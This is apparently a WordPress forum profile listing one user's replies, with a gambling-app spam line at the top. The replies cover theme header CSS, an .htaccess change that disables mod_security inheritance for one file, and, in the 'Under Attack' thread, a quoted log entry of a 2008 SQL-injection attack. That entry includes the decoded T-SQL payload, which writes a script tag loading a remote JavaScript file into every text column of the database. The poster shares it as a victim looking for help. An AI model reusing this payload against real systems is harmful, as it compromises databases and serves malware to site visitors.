Royal Club login app download free.Makakuha ng libreng 700pho sa bawat deposito

Forum Replies Created

Viewing 6 replies - 1 through 6 (of 6 total)

Forum: Themes and Templates
In reply to: adding a custom header to a theme

pacq
(@pacq)

15 years, 10 months ago

Hello Ryanpoo,
I’m Andrea, the author of Tomorrow.

Basically, you should define some CSS properties for the div#header block,
say: font size, background image, and so on.

If you don’t have a great confidence with CSS, write me to
themes at pacquola.org
describing the exact kind of header you’d like to have.
I’ll try to answer in detail.

Forum: Everything else WordPress
In reply to: Under Attack

pacq
(@pacq)

16 years, 3 months ago

1. Unless someone is able to use your server to redirect traffic or execute on their browser exploit code (end user hits you with that URL and then KABLAM on them)

or

2. Those URLs cause your WordPress installation getting compromise and exploited (data successfully added to your database or filesystem).

Thank you for your explanation.
I checked either the database either the logs, all seems ok (for now).

But… they did not have nothing else to do?

Forum: Everything else WordPress
In reply to: Under Attack
pacq
(@pacq)

16 years, 3 months ago
Hello,
the same happened to me.
Looking at the log files, I noticed the following record:
```
116.48.67.106 - - [09/Aug/2008:05:58:47 +0300] "GET /2008/03/15/sottsass/?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x 

....about 650 hex characters follows...

0CHAR(4000));EXEC(@S); HTTP/1.1" 200 11878 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
```
The hex string, once translated, shows the following:
```
GET /2008/03/15/sottsass/?';DECLARE @SCHAR(4000);SET @S=CAST(DECLARE @T varchar(255)'@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name'b.name from sysobjects a'syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T'@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="https://sdo.1000mg.cn/csrss/w.js"></script><!--'' where '+@C+' not like ''%"></title><script src="https://sdo.1000mg.cn/csrss/w.js"></script><!--''')FETCH NEXT FROM  Table_Cursor INTO @T'@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor AS% CHAR(4000));EXEC(@S)
```
Where is a reference to a js script, located in (omitted here):
This scripts, also, has references to three urls (omitted here).

In particular, the last two are reported as malicious sites.

The attack comes from:
IP : 116.48.67.106
Host Name : n1164867106.netvigator.com
Country : Hong Kong

Is it a possible security problem of WordPress?
What are the potential risks?
Forum: Installing WordPress
In reply to: Upgrade to 2.2 – Dashboard not working

Thread Starter pacq
(@pacq)

17 years, 6 months ago

Oops!..excuse me..:P

Pacq

Forum: Installing WordPress
In reply to: Upgrade to 2.2 – Dashboard doesn’t work

Thread Starter pacq
(@pacq)

17 years, 6 months ago

Hello Michael,

thank you, reading the topic 117993 I found the solution:
I have to modify my .htaccess file adding the lines:
<Files index-extra.php> SecFilterInheritance Off </Files>

Thanks to all,

Pacq

Forum: Installing WordPress
In reply to: Upgrade to 2.2 – Dashboard not working
Thread Starter pacq
(@pacq)

17 years, 6 months ago
Hello,

Deerhunter04’s solution solved my problem…
```
<Files index-extra.php>
SecFilterInheritance Off
</Files>
```
Many thanks to Specks, Deerhunter and Whooami ??

Pacq

Viewing 6 replies - 1 through 6 (of 6 total)